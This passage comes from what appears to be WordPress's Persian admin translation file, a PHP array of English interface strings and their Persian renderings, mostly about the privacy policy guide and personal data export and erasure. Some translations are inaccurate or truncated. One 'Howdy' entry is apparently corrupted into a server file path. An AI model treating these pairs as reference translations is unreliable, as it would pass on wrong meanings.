خواهد ماند و در راهبری سایتتان (در بیشتر پوسته‌ها) نشان داده خواهد شد. بیشتر مردم با یک برگه درباره که آن‌ها را به بازدیدکنندگان بالقوهٔ سایت معرفی می‌کند، آغاز می‌کنند. که ممکن است چیزی همانند این باشد:','Export “%s” as JSON'=>'برون‌بری “%s” بصورت JSON','1 pattern not updated, somebody is editing it.'=>'1 پترن به‌روزرسانی نشد، فردی در حال ویرایش آن است.','%s pattern restored from the Trash.'=>'%s پترن از سطل زباله بازیابی شد.','Error: "Table Prefix" must not be empty.'=>'خطا: "پیشوند جدول" نباید خالی باشد.','This meta box, from the %s plugin, is not compatible with the block editor.'=>'این جعبهٔ متا، از افزونهٔ %s، با ویرایشگر بلوک سازگار نیست.','personal data group labelAbout'=>'درباره','page titleAbout'=>'درباره','Edit or preview your Privacy Policy page content.'=>'ویرایش یا پیش‌نمایش محتوای برگهٔ سیاست حریم خصوصی شما.','Privacy Policy Page'=>'برگه سیاست حریم خصوصی','%s (Draft)'=>'%s (پیش‌نویس)','Privacy Policy page updated successfully.'=>'برگه حریم خصوصی با موفقیت به‌روزرسانی شد.','The suggested privacy policy content should be added by using the %s (or later) action. Please see the inline documentation.'=>'The suggested privacy policy content should be added by using the %s (or later) action. Please see the inline documentation.','The suggested privacy policy content should be added only in wp-admin by using the %s (or later) action.'=>'The suggested privacy policy content should be added only in wp-admin by using the %s (or later) action.','The suggested privacy policy text has changed. Please review the guide and update your privacy policy.'=>'متن سیاست حریم خصوصی پیشنهادی تغییر کرده است. لطفاً راهنما را بررسی کنید و سیاست حریم خصوصی خود را به‌روزرسانی نمایید.','There are no pages.'=>'هیچ برگه‌ای وجود ندارد.','Need help putting together your new Privacy Policy page? Check out the privacy policy guide%3$s for recommendations on what content to include, along with policies suggested by your plugins and theme.'=>'آیا نیازمند کمک برای تنظیم برگهٔ سیاست حریم خصوصی تازهٔ خود هستید؟ برای توصیه‌هایی در مورد این که باید شامل چه محتوایی باشد، راهنمای ما%3$s را بررسی کنید. در کنار آن، سیاست‌های پیشنهادی افزونه‌ها و پوسته‌ها را هم ببینید.','Privacy Policy Guide'=>'راهنمای سیاست حریم خصوصی','Visitor comments may be checked through an automated spam detection service.'=>'دیدگاه‌های بازدیدکننده ممکن است از طریق یک سرویس تشخیص جفنگ خودکار بررسی شوند.','In this subsection you should note what analytics package you use, how users can opt out of analytics tracking, and a link to your analytics provider’s privacy policy, if any.'=>'در این بخش باید توضیح دهید که از چه ابزار تحلیلی استفاده می‌کنید، کاربران چگونه می‌توانند از ردیابی تحلیلی مستثنی شوند و اگر ارائه‌دهندهٔ ابزار تحلیلی، سیاست حریم خصوصی دارد، پیوند آن را اضافه کنید.','In this subsection you should note what information may be disclosed by users who can upload media files. All uploaded files are usually publicly accessible.'=>'در این بخش شما باید توجه داشته باشید که چه اطلاعاتی می‌تواند توسط کاربرانی که می‌توانند فایل‌های رسانه را آپلود کنند، افشا شود.','In this subsection you should note what information is captured through comments. We have noted the data which WordPress collects by default.'=>'در این زیربخش، شما باید اطلاعتی را که از راه نظرات ذخیره می‌شود ذکر کنید. ما داده‌هایی را که توسط وردپرس به صورت پیش‌فرض جمع‌آوری می‌شود ذکر کرده‌ایم.','In this section you should note what personal data you collect from users and site visitors. This may include personal data, such as name, email address, personal account preferences; transactional data, such as purchase information; and technical data, such as information about cookies.'=>'در این بخش باید توجه داشته باشید که اطلاعات شخصی شما از کاربران و بازدیدکنندگان سایت جمع آوری می‌شود. این ممکن است شامل اطلاعات شخصی، مانند نام، آدرس ایمیل، تنظیمات شخصی شخصی باشد؛ داده‌های معاملات، مانند اطلاعات خرید؛ و داده‌های فنی، مانند اطلاعات مربوط به کوکی ها.','Suggested text:'=>'متن پیشنهادی:','The template contains a suggestion of sections you most likely will need. Under each section heading, you will find a short summary of what information you should provide, which will help you to get started. Some sections include suggested policy content, others will have to be completed with information from your theme and plugins.'=>'پوسته محتوی پیشنهادی از بخش‌هایی که شما نیاز دارید است. در زیر سربرگ هر بخش، به خلاصه‌‌ای از اطلاعاتی که شما بهتر است ارائه دهید اشاره شده، که برای شروع به شما کمک می‌کند. بعضی از بخش‌ها شامل محتوای سیاست پیشنهادی است، و بخش‌های دیگر می‌باید با اطلاعاتی ازپوسته و افزونه‌های شما کامل شود.','Updated %s.'=>'%s به‌روزرسانی شد.','You deactivated this plugin on %s and may no longer need this policy.'=>'شما این افزونه را در %s غیر فعال کردید و ممکن است دیگر نیاز به این سیاست نداشته باشید.','Removed %s.'=>'%s حذف شد.','Introduction'=>'مقدمه','Need help putting together your new Privacy Policy page? Check out the guide for recommendations on what content to include, along with policies suggested by your plugins and theme.'=>'برای قراردادن برگه سیاست حفظ حریم خصوصی جدیدتان نیازمند کمک هستید؟ راهنمایی ما برای توصیه‌هایی در مورد اینکه چه محتوایی باید باشد، همراه با سیاست‌های پیشنهادی برای افزونه‌ها و پوسته‌هایتان را بررسی نمایید.','Erasing data...'=>'حذف داده...','Add Data Erasure Request'=>'افزودن درخواست حذف اطلاعات','Send export link'=>'ارسال پیوند برون‌بری','If you are a member of a regulated industry, or if you are subject to additional privacy laws, you may be required to disclose that information here.'=>'اگر عضو جامعه صنعتی با قوانین نظارتی خاص هستید و یا مشمول قوانین افزوده حریم خصوصی می‌شوید، ضروری است که اطلاعات آن را در اینجا مطرح کنید.','Industry regulatory disclosure requirements'=>'الزامات افشای قانونی صنعت','If your website provides a service which includes automated decision making - for example, allowing customers to apply for credit, or aggregating their data into an advertising profile - you must note that this is taking place, and include information about how that information is used, what decisions are made with that aggregated data, and what rights users have over decisions made without human intervention.'=>'اگر وب سایت شما یک سرویس ارائه می‌دهد که شامل تصمیم گیری خودکار می‌شود - به عنوان مثال، اجازه می‌دهد مشتریان برای درخواست اعتبار، یا جمع آوری داده‌های خود را به یک نمایه تبلیغاتی - شما باید توجه داشته باشید که این اتفاق می‌افتد، و شامل اطلاعات در مورد نحوه استفاده از این اطلاعات، چه تصمیماتی با داده‌های جمع آوری شده انجام می‌شود و چه کاربران حقوق بیش از تصمیم گیری را بدون دخالت انسانی گرفته‌اند.','What automated decision making and/or profiling we do with user data'=>'تصمیم گیری خودکار و / یا پروفایل ما با داده‌های کاربر انجام می‌شود','If your website receives data about users from third parties, including advertisers, this information must be included within the section of your privacy policy dealing with third party data.'=>'اگر وب سایت شما از طریق اشخاص ثالث، از جمله تبلیغ‌کنندگان، داده‌هایی درباره کاربران دریافت می‌کند، این اطلاعات باید در بخش سیاست حریم خصوصی در مواجه با داده‌های شخص ثالث، گنجانده شود.','What third parties we receive data from'=>'چه چیز جدیدی از داده‌ها دریافت می‌کنیم','In this section you should explain what procedures you have in place to deal with data breaches, either potential or real, such as internal reporting systems, contact mechanisms, or bug bounties.'=>'در این بخش، شما باید روشهایی را که برای مقابله با نقضهای اطلاعاتی، پتانسیل یا واقعی، مانند سیستمهای گزارشگری داخلی، مکانیزمهای ارتباطی، و یا مشکلات احتمالی دارید، توضیح دهید.','What data breach procedures we have in place'=>'چه رویه‌های نقض اطلاعات در حال حاضر وجود دارد','In this section you should explain what measures you have taken to protect your users’ data. This could include technical measures such as encryption; security measures such as two factor authentication; and measures such as staff training in data protection. If you have carried out a Privacy Impact Assessment, you can mention it here too.'=>'در این بخش شما باید اقداماتی را که برای حفاظت از اطلاعات کاربران ’ خود انجام داده‌اید توضیح دهید.','How we protect your data'=>'چگونه از اطلاعات شما حفاظت می‌کنیم','If you use your site for commercial purposes and you engage in more complex collection or processing of personal data, you should note the following information in your privacy policy in addition to the information we have already discussed.'=>'اگر از سایت خود برای اهداف تجاری استفاده می‌کنید و در جمع آوری یا پردازش اطلاعات شخصی ترفیع بیشتری قرار می‌گیرید، علاوه بر اطلاعاتی که قبلا مورد بحث بوده ایم، اطلاعات زیر را در سیاست حفظ حریم خصوصی خود ذکر می‌کنیم.','Additional information'=>'اطلاعات اضافی','In this section you should provide a contact method for privacy-specific concerns. If you are required to have a Data Protection Officer, list their name and full contact details here as well.'=>'در این بخش شما باید یک روش تماس برای موارد مختص به حریم خصوصی ارائه دهید. اگر شما ملزم به داشتن مسئول حفاظت از اطلاعات هستید، نام و جزئیات کامل تماس با این فرد را نیز تکمیل کنید.','European data protection law requires data about European residents which is transferred outside the European Union to be safeguarded to the same standards as if the data was in Europe. So in addition to listing where data goes, you should describe how you ensure that these standards are met either by yourself or by your third party providers, whether that is through an agreement such as Privacy Shield, model clauses in your contracts, or binding corporate rules.'=>'قانون حفاظت از داده‌های اروپا نیاز به داده‌های مربوط به ساکنان اروپایی دارد که در خارج از اتحادیه اروپا منتقل می‌شود تا به همان استانداردهای محافظت شود که داده‌ها در اروپا باشد. بنابراین علاوه بر فهرستی که داده‌ها می‌رود، شما باید نحوه تضمین این که آیا این استانداردها توسط خود یا ارائه دهنده‌های شخص ثالث شما مطابقت دارند یا خیر، از طریق یک توافقنامه مانند سپر حریم خصوصی، شرایط مدل در قراردادهای شما، یا شرکت‌های مجاز قوانین','In this section you should list all transfers of your site data outside the European Union and describe the means by which that data is safeguarded to European data protection standards. This could include your web hosting, cloud storage, or other third party services.'=>'در این بخش شما باید همه انتقال داده‌های سایت خود را در خارج از اتحادیه اروپا فهرست کنید و معیارهایی را که توسط آن داده‌ها به استانداردهای حفاظت از داده‌های اروپا محافظت می‌شود، شرح دهید. این می‌تواند شامل میزبانی وب شما، ذخیره سازی ابر یا سایر سرویس‌های شخص ثالث باشد.','If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.'=>'اگر در این سایت حساب کاربری دارید یا نظری ارسال کرده‌اید، می‌توانید درخواست دریافت یک فایل خروجی از اطلاعات شخصی که ما در مورد شما نگه می‌داریم، از جمله هرگونه داده‌ای که برای ما ارائه کرده‌اید را بدهید. همچنین می‌توانید درخواست کنید که ما هرگونه اطلاعات شخصی که در مورد شما داریم را پاک کنیم. این شامل اطلاعاتی نیست که ما مجبور به نگهداری آنها برای اهداف اداری، قانونی یا امنیتی باشیم.','In this section you should explain what rights your users have over their data and how they can invoke those rights.'=>'در این بخش شما باید توضیح دهید که حقوق کاربران شما بر روی داده‌های آنها چگونه است و چگونه می‌توانند از این حقوق استفاده کنند.','What rights you have over your data'=>'حقوقی که بر روی داده‌هایتان دارید','For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.'=>'برای کاربرانی که در وب سایت ما ثبت نام می‌کنند (اگر وجود داشته باشند)، ما همچنین اطلاعات شخصی را که در مشخصات کاربر آنها ارائه می‌کنیم، ذخیره می‌کنیم. همه کاربران می‌توانند اطلاعات شخصی خود را در هر زمان (به جز آنها که نمی‌توانند نام کاربری خود را تغییر دهند) ببینند، ویرایش و یا حذف کنند. مدیران وب سایت همچنین می‌توانند این اطلاعات را مشاهده و ویرایش کنند.','If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.'=>'اگر یک نظر را ارسال کنید، نظر و متادیتای آن به طور نامحدود حفظ می‌شوند. این به این معنا است که ما می‌توانیم نظرات بعدی را بطور خودکار بجای اینکه در صف بازدید قرار دهیم، تشخیص داده و تایید کنیم.','In this section you should explain how long you retain personal data collected or processed by the website. While it is your responsibility to come up with the schedule of how long you keep each dataset for and why you keep it, that information does need to be listed here. For example, you may want to say that you keep contact form entries for six months, analytics records for a year, and customer purchase records for ten years.'=>'در این قسمت شما باید توضیح دهید که چه مدت اطلاعات شخصی خود را که از طریق وب سایت جمع آوری شده یا پردازش شده نگهداری می‌کنید. در حالی که این مسئولیت شماست که برنامهٔ زمانبندی هر یک از مجموعه داده‌ها را حفظ نمایید و به همین دلیل آن را نگه دارید، این اطلاعات باید در اینجا فهرست شود. به عنوان مثال، ممکن است بخواهید بگویید که برای مدت شش ماه، پرونده‌های تجزیه و تحلیل برای یک سال و پرونده‌های خرید مشتری برای ده سال نگه دارید.','How long we retain your data'=>'چه مدت ما اطلاعات شما را حفظ می‌کنیم','By default WordPress does not share any personal data with anyone.'=>'بطور پیش‌فرض وردپرس هیچ اطلاعات شخصی را با کسی به اشتراک نمی‌گذارد.','In this section you should name and list all third party providers with whom you share site data, including partners, cloud-based services, payment processors, and third party service providers, and note what data you share with them and why. Link to their own privacy policies if possible.'=>'در این بخش، شما باید همه ارائه دهندگان شخص ثالث را که با آنها به اشتراک می‌گذارید، از جمله شرکای، سرویس‌های مبتنی بر ابر، پردازنده‌های پرداخت، و ارائه دهندگان خدمات شخص ثالث نامگذاری و فهرست کنید، و توجه داشته باشید که چه داده هایی را با آنها به اشتراک می‌گذارید و چرا. پیوستن به سیاست‌های حفظ حریم خصوصی خود را در صورت امکان.','Who we share your data with'=>'اطلاعات شما را با چه کسی به اشتراک می‌گذاریم','By default WordPress does not collect any analytics data. However, many web hosting accounts collect some anonymous analytics data. You may also have installed a WordPress plugin that provides analytics services. In that case, add information from that plugin here.'=>'به طور پیش‌فرض وردپرس هیچ داده تجزیه و تحلیل را جمع آوری نمی‌کند. با این حال، بسیاری از حساب‌های میزبانی وب برخی از داده‌های تجزیه و تحلیل ناشناس را جمع آوری می‌کنند. شما هم‌چنین ممکن است یک افزونهٔ وردپرس را نصب کنید که خدمات تجزیه و تحلیل را فراهم می‌کند. در این صورت، اطلاعات را از آن افزونه در این‌جا اضافه کنید.','Analytics'=>'تجزیه و تحلیل','These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.'=>'این وبسایت‌ها ممکن است اطلاعاتی مربوط به شما را جمع‌آوری کنند، از کوکی‌ها استفاده کنند، ردیابی سوم شخص اضافه را جاسازی کنند و تعامل شما را با محتوای تعبیه شده نظارت کنند که شامل ردیابی تعامل شما با محتوای جاسازی شده است اگر حساب کاربری داشته و به آن وبسایت وارد شده باشید.','Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.'=>'مقالات موجود در این سایت ممکن است شامل محتوای تعبیه شده (مثلا ویدئوها، تصاویر، مقالات و غیره) باشد. مطالب جاسازی شده از وب سایت‌های دیگر رفتار دقیقا همان طوری که بازدید کننده از وب سایت دیگر بازدید کرده است.','Embedded content from other websites'=>'محتوای جاسازی‌شده از دیگر وب‌سایت‌ها','If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.'=>'اگر یک مقاله را ویرایش یا منتشر کنید، یک کوکی اضافی در مرورگر شما ذخیره خواهد شد. این کوکی حاوی اطلاعات شخصی نیست و به سادگی نشان می‌دهد که شناسه پست مقاله شما فقط ویرایش شده است. بعد از یک روز منقضی می‌شود.','When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.'=>'هنگام ورود به سیستم، ما همچنین کوکی‌ها را تنظیم خواهیم کرد تا اطلاعات ورود به سیستم و گزینه‌های صفحه نمایش خود را ذخیره کنید. کوکی‌های ورود به سیستم برای دو روز گذشته و کوکی‌های گزینه‌های صفحه نمایش برای یک سال گذشته است. اگر " مرا به خاطر بسپار " را انتخاب کنید، ورود شما برای دو هفته ادامه خواهد داشت. اگر از حساب خود خارج شوید، کوکی‌های ورود حذف خواهند شد.','If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.'=>'اگر از برگه ورود ما بازدید نمایید، ما یک کوکی موقت برای مشخص نمودن اینکه آیا مرورگر شما کوکی قبول می‌کند را تنظیم می‌کنیم. این کوکی محتوای اطلاعات شخصی شما نیست و وقتی مرورگر شما بسته می‌شود از بین می‌رود.','If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.'=>'اگر شما نظر خود را در سایت ما ثبت کنید، می‌توانید برای ذخیره نام، آدرس ایمیل و وب سایت خود در کوکی‌ها تصمیم‌گیری کنید. اینها برای راحتی شما هستند، به طوری که شما مجبور نیستید زمانی که نظر دیگری را ارسال می‌کنید، دوباره جزئیات خود را پر کنید. این کوکی‌ها به مدت یک سال دوام خواهند داشت.','In this subsection you should list the cookies your website uses, including those set by your plugins, social media, and analytics. We have provided the cookies which WordPress installs by default.'=>'در این قسمت شما باید کوکی‌هایی را که وب‌سایتتان از آن استفاده می‌کند را فهرست کنید، از جمله مواردی که توسط افزونه‌ها، رسانه‌های اجتماعی و تحلیلی تنظیم شده است. ما کوکی‌هایی را که وردپرس به طور پیش‌فرض نصب می‌کند ارائه داده‌ایم.','Cookies'=>'کوکی‌ها','An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.'=>'یک رشته ناشناس ایجاد شده از آدرس ایمیل شما (همچنین هش نامیده می‌شود) ممکن است به سرویس Gravatar ارائه شود تا ببینید آیا از آن استفاده می‌کنید. سیاست حفظ حریم خصوصی خدمات Gravatar در اینجا در دسترس است: https://automattic.com/privacy/. پس از تأیید نظر شما، تصویر نمایه شما در متن نظر شما قابل مشاهده است.','When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.'=>'هنگامی که بازدیدکنندگان دیدگاه خود را در سایت می‌نویسند، داده‌های نشان داده شده در فرم دیدگاه‌ها و همچنین آدرس IP بازدیدکننده و رشته عامل کاربر مرورگر را برای کمک به تشخیص هرزنامه جمع‌آوری می‌کنیم.','By default, WordPress does not include a contact form. If you use a contact form plugin, use this subsection to note what personal data is captured when someone submits a contact form, and how long you keep it. For example, you may note that you keep contact form submissions for a certain period for customer service purposes, but you do not use the information submitted through them for marketing purposes.'=>'به طور پیش‌فرض، وردپرس یک فرم تماس را شامل نمی‌شود. اگر از یک پلاگین فرم تماس استفاده می‌کنید، از این بخش استفاده کنید تا توجه کنید که چه اطلاعات شخصی هنگام ثبت نام یک فرم تماس، و چه مدت آن را نگه دارید. به عنوان مثال، شما ممکن است توجه داشته باشید که شما درخواست ارسال فرم تماس را برای یک دوره مشخص برای اهداف خدمات مشتری نگه دارید، اما از اطلاعاتی که از طریق آنها برای اهداف بازاریابی ارسال شده است استفاده نمی‌کنید.','Contact forms'=>'فرم‌های تماس','If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.'=>'اگر تصاویر را به وبسایت آپلود کنید، نباید آپلود تصاویر با داده‌های مکان جغرافیایی (EXIF GPS) شامل شود. بازدیدکنندگان وب سایت می‌توانند هر گونه اطلاعات مکان را از تصاویر در وب سایت دانلود و استخراج کنند.','By default WordPress does not collect any personal data about visitors, and only collects the data shown on the User Profile screen from registered users. However some of your plugins may collect personal data. You should add the relevant information below.'=>'به طور پیش‌فرض وردپرس هیچ اطلاعات شخصی در مورد بازدیدکنندگان جمع آوری نمی‌کند و تنها اطلاعات نشان داده شده روی صفحهٔ پروفایل کاربرانی که نام‌نویسی کرده‌اند را جمع آوری می‌کند. با این حال برخی از پلاگین‌های شما ممکن است اطلاعات شخصی را جمع آوری کند. شما باید اطلاعات مربوطه را در زیر اضافه کنید.','Personal data is not just created by a user’s interactions with your site. Personal data is also generated from technical processes such as contact forms, comments, cookies, analytics, and third party embeds.'=>'داده‌های شخصی تنها با تعامل کاربر با سایت شما ایجاد می‌شود. این داده‌ها از پروسه‌های فنی مانند فرم‌های تماس، نظرات، کوکی ها، آمارها و جایگذاری شخص ثالث نیز تولید می‌شود.','In addition to listing what personal data you collect, you need to note why you collect it. These explanations must note either the legal basis for your data collection and retention or the active consent the user has given.'=>'علاوه بر لیست کردن اطلاعات شخصی که جمع آوری می‌کنید، باید دلیل جمع آوری این اطلاعات را هم ذکر کنید. این توضیحات یا باید پایه قانونی جمع آوری و نگهداری اطلاعات کاربران و یا رضایت آگاهانه کاربر را مد نظر قرار دهد.','You should also note any collection and retention of sensitive personal data, such as data concerning health.'=>'همچنین باید هرگونه جمع آوری و نگهداری اطلاعات شخصی حساس، مانند اطلاعات مربوط به سلامت را ذکر کنید.','What personal data we collect and why we collect it'=>'کدامیک از اطلاعات شخصی را جمع آوری میکنیم و چرا','Our website address is: %s.'=>'نشانی وب‌سایت ما: %s.','The amount of information you may be required to show will vary depending on your local or national business regulations. You may, for example, be required to display a physical address, a registered address, or your company registration number.'=>'مقدار اطلاعاتی که ممکن است برای نشان دادن مورد نیاز باشد، بسته به شرایط کاری محلی یا ملی شما متفاوت خواهد بود. برای مثال ممکن است شما مجاز به نمایش یک آدرس فیزیکی، یک آدرس ثبت شده یا شماره ثبت شرکت خود باشید.','In this section you should note your site URL, as well as the name of the company, organization, or individual behind it, and some accurate contact information.'=>'در این بخش شما باید آدرس سایت خود و همچنین نام شرکت، سازمان، و یا مدیر آن، و برخی از اطلاعات تماس را دقیق بنویسید.','Who we are'=>'ما که هستیم','It is your responsibility to write a comprehensive privacy policy, to make sure it reflects all national and international legal requirements on privacy, and to keep your policy current and accurate.'=>'مسئولیت شما این است که یک سیاست حفظ حریم خصوصی جامع بنویسید تا اطمینان حاصل شود که تمام الزامات قانونی ملی و بین المللی در مورد حریم خصوصی شما رعایت شده باشد و همچنین سیاست در حال حاضر خود را شامل شود.','Please edit your privacy policy content, making sure to delete the summaries, and adding any information from your theme and plugins. Once you publish your policy page, remember to add it to your navigation menu.'=>'لطفا محتوای سیاست حفظ حریم خصوصی خود را ویرایش و مطمئن شوید خلاصه‌ها را حذف کرده‌اید و هر اطلاعاتی را که از پوسته و افزونه‌های خود لازم می‌دانید اضافه کنید. هنگامی که صفحه سیاست خود را منتشر می‌کنید به یاد داشته باشید که آن را به فهرست راهبری خود اضافه کنید.','This text template will help you to create your website’s privacy policy.'=>'این قالب متنی به شما کمک می‌کند تا سیاست حریم خصوصی وب‌سایتتان را ایجاد نمایید.','As a website owner, you may need to follow national or international privacy laws. For example, you may need to create and display a privacy policy.'=>'به عنوان یک مالک وب سایت، ممکن است شما نیاز به دنبال کردن قوانین حریم خصوصی بین‌المللی یا ملی داشته باشید. برای مثال، ممکن است نیاز به ایجاد و نمایش یک حریم خصوصی باشید.','Force erasure has failed.'=>'حذف اجباری ناموفق بود.','Email could not be sent.'=>'ایمیل نمی‌تواند ارسال شود.','date/timeOn'=>'در','website URLAt URL'=>'در نشانی URL','website nameFor site'=>'برای سایت','email addressReport generated for'=>'گزارش تولیدشده برای','Exporter array at index %s does not include a friendly name.'=>'آرایه صادر کننده در فهرست %s یک نام دوستانه را شامل نمی‌شود.','Sorry, you are not allowed to erase personal data on this site.'=>'باعرض پوزش، شما مجاز به حذف داده‌ها در این سایت نمی‌باشید.','Sorry, you are not allowed to export personal data on this site.'=>'با عرض پوزش، شما مجاز به صدور داده‌های شخصی در این سایت نمی‌باشید.','Eraser index is out of range.'=>'اندیس پاک‌کننده خارج از محدوده است.','Missing eraser index.'=>'فاقد اندیس پاک‌کننده.','Expected done (boolean) in response array from exporter: %s.'=>'انتظار می‌رود انجام شده (بولین) در آرایه پاسخ از صادر کننده: %s.','Expected data array in response array from exporter: %s.'=>'آرایه داده انتظار در آرایه پاسخ از صادر کننده: %s.','Expected data in response array from exporter: %s.'=>'داده‌های انتظار در آرایه پاسخ از صادر کننده: %s.','Expected response as an array from exporter: %s.'=>'انتظار پاسخ به عنوان یک آرایه از صادر کننده: %s.','Exporter callback is not a valid callback: %s.'=>'پاسخگویی صادر کننده Callback معتبر نیست: %s.','Exporter does not include a callback: %s.'=>'برون‌ریز دارای یک فراخوان بازگشتی نیست: %s.','Expected an array describing the exporter at index %s.'=>'آرایه‌ای که صادر کننده را در فهرست قرار می‌دهد انتظار می‌رود %s.','Exporter index is out of range.'=>'اندیس برون‌بر خارج از محدوده است.','Exporter index cannot be negative.'=>'فهرست برون‌بر نمی‌تواند منفی باشد.','An exporter has improperly used the registration filter.'=>'یک صادر کننده نامناسب از فیلتر ثبت نام استفاده می‌کند.','Missing page index.'=>'فاقد اندیس برگه.','Missing exporter index.'=>'فاقد اندیس برون‌بر.','Invalid request type.'=>'نوع درخواست نامعتبر.','Use This Page'=>'استفاده از این برگه','Select a Privacy Policy page'=>'برگه‌ای برای سیاست حریم خصوصی انتخاب کنید','Change your Privacy Policy page'=>'تغییر برگه سیاست حفظ حریم خصوصی شما','Edit or view your Privacy Policy page content.'=>'ویرایش یا مشاهده محتوای برگه حریم خصوصی تان.','You should also review your privacy policy from time to time, especially after installing or updating any themes or plugins. There may be changes or new suggested information for you to consider adding to your policy.'=>'شما باید سیاست حریم خصوصی خود را گاه گداری بررسی کنید، مخصوصا بعد از نصب و به‌روزرسانی هر پوسته یا افزونه‌ای. ممکن است تغییرات یا اطلاعات پیشنهادی جدیدی برای شما جهت رسیدگی برای افزودن به حریم شما وجود داشته باشد.','However, it is your responsibility to use those resources correctly, to provide the information that your privacy policy requires, and to keep that information current and accurate.'=>'با این حال، مسئولیت شما این است که از این منابع به درستی استفاده نمایید، اطلاعاتی که سیاست حفظ حریم خصوصی شما نیاز دارد را فراهم کنید، و این اطلاعات را جاری و دقیق نگه دارید.','The new page will include help and suggestions for your privacy policy.'=>'برگه جدید شامل راهنما و پیشنهادهایی برای سیاست حریم خصوصی شما خواهد بود.','If you already have a Privacy Policy page, please select it below. If not, please create one.'=>'در صورتی که درحال حاضر یک برگه حریم خصوصی دارید، لطفا آن را در زیر انتخاب کنید. در غیر این صورت، لطفا یکی ایجاد کنید.','The currently selected Privacy Policy page is in the Trash. Please create or select a new Privacy Policy page or restore the current page.'=>'برگه حریم خصوصی انتخاب شده فعلی در زباله‌دان است. لطفا یک برگه حریم خصوصی جدید ایجاد یا انتخاب نمایید یا برگه فعلی را بازیابی نمایید.','The currently selected Privacy Policy page does not exist. Please create or select a new page.'=>'برگه فعلی انتخاب شده وجود ندارد. لطفا یک برگه جدید ایجاد یا انتخاب نمایید.','Unable to create a Privacy Policy page.'=>'نمی‌توان برگه حفظ حریم خصوصی را ایجاد کرد.','privacy-policy'=>'سیاست-حفظ-حریم-خصوصی','Privacy Policy page setting updated successfully. Remember to update your menus!'=>'برگه تنظیم حریم خصوصی باموفقیت به‌روزرسانی شد. به یاد داشته باشید که فهرست‌های خود را به‌روزرسانی نمایید!','Copy suggested policy text from %s.'=>'کپی کردن متن حریم شخصی پیشنهادشده از %s.','Howdy, /home/filetir/public_html/wp-content/languages/admin-fa_IR.l10n.php:###SITEURL###','Email sent.'=>'ایمیل ارسال شد.','Sending email...'=>'ارسال ایمیل...','Download personal data again'=>'اطلاعات شخصی را دوباره دریافت نمایید','Unable to send personal data export email.'=>'امکان ایمیل داده‌های شخصی وجود ندارد.','[%s] Personal Data Export'=>'برون‌بری داده‌های شخصی [%s]','Invalid request ID when sending personal data export email.'=>'شناسه درخواست نامعتبر هنگام ارسال ایمیل برون‌بر داده‌های شخصی.','Personal Data Export'=>'برون‌بری داده‌های شخصی','Personal Data Export for %s'=>'برون ریزی اطلاعات شخصی برای %s','A valid email address must be given.'=>'یک آدرس ایمیل معتبر باید داده شود.','Force erase personal data'=>'حذف اجباری داده‌های شخصی','Remove request'=>'حذف درخواست','Waiting for confirmation'=>'منتظر برای تایید','Downloading data...'=>'در حال دریافت داده‌ها…','Download personal data'=>'دربافت داده‌های شخصی','Requested'=>'درخواست شد','Requester'=>'درخواست کننده','Send Request'=>'ارسال درخواست','Username or email address'=>'نام کاربری یا نشانی ایمیل','Add Data Export Request'=>'افزودن درخواست صدور داده‌ها','Confirmation request initiated successfully.'=>'درخواست تایید باموفقیت آغاز شد.','Unable to add this request. A valid email address or username must be supplied.'=>'امکان اضافه کردن این درخواست وجود ندارد. یک آدرس ایمیل معتبر یا نام کاربری باید ارائه شود.','Confirmation request sent again successfully.'=>'درخواست تأیید دوباره با موفقیت ارسال شد.','Unable to initiate confirmation request.'=>'عدم توانایی در شروع درخواست تایید.','Invalid request ID.'=>'شناسه درخواست نامعتبر.','Expected done flag in response array from %1$s eraser (index %2$d).'=>'انتظار می‌رود پرچم انجام شده در پاسخ آرایه از %1$s پاک کن (فهرست %2$d).','Expected messages key to reference an array in response array from %1$s eraser (index %2$d).'=>'پیام‌های مورد انتظار برای ارجاع یک آرایه در آرایه پاسخ از %1$s پاک کن (فهرست %2$d).','Expected messages key in response array from %1$s eraser (index %2$d).'=>'پیام‌های منتظره در آرایه پاسخ از %1$s پاک کن (فهرست %2$d).','Expected items_retained key in response array from %1$s eraser (index %2$d).'=>'اقلام مورد انتظار کلید در آرایه پاسخ از %1$s پاک کن (فهرست %2$d).','Expected items_removed key in response array from %1$s eraser (index %2$d).'=>'منتظر کلید items_removed در آرایهٔ پاسخ از پاک‌کنندهٔ %1$s (شاخص %2$d).','Did not receive array from %1$s eraser (index %2$d).'=>'آرایه‌ای از پاک کننده %1$s دریافت نشد (شاخص %2$d).','Eraser array at index %d does not include a friendly name.'=>'آرایه پاک کن در فهرست %d یک نام دوستانه را شامل نمی‌شود.','Expected an array describing the eraser at index %d.'=>'انتظار می‌رود یک آرایه توصیف پاک کن در فهرست %d.','Page index cannot be less than one.'=>'اندیس برگه نمی‌تواند کمتر از یک باشد.','Eraser index cannot be less than one.'=>'اندیس پاک‌کننده نمی‌تواند کمتر از یک باشد.','Invalid email address in request.'=>'نشانی ایمیل نامعتبر در درخواست.','Requires PHP Version:'=>'نگارش PHP مورد نیاز:','This data is used to provide general enhancements to WordPress, which includes helping to protect your site by finding and automatically installing new updates. It is also used to calculate statistics, such as those shown on the 